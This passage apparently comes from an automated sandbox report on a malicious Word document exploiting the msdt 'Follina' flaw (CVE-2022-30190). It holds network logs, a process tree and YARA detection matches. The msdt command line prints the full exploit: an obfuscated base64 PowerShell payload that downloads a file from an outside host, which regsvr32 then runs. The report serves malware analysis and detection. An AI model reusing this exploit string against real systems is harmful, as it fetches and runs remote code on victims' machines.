                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.822417021 CEST1292OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.845601082 CEST1292INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=95
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:09.210685015 CEST1292OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:09.233540058 CEST1293INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:09 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=94
                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:17:39:53
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                            Imagebase:0xe90000
                                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:17:40:00
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                            Imagebase:0x1110000
                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:17:40:00
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                            Imagebase:0x1110000
                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:17:40:06
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                            Imagebase:0x100000
                                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.729808859.0000000002830000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.729847278.0000000002838000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.729643897.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.730773001.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:17:40:43
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline
                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:19
                                                                                                                                                                            Start time:17:40:46
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"
                                                                                                                                                                            Imagebase:0x1300000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:17:40:50
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline
                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:22
                                                                                                                                                                            Start time:17:40:52
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"
                                                                                                                                                                            Imagebase:0x1300000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:17:41:14
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\Fros.poster
                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:17:41:16
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline
                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:29
                                                                                                                                                                            Start time:17:41:18
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"
                                                                                                                                                                            Imagebase:0x1300000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Disassembly

                                                                                                                                                                            No disassembly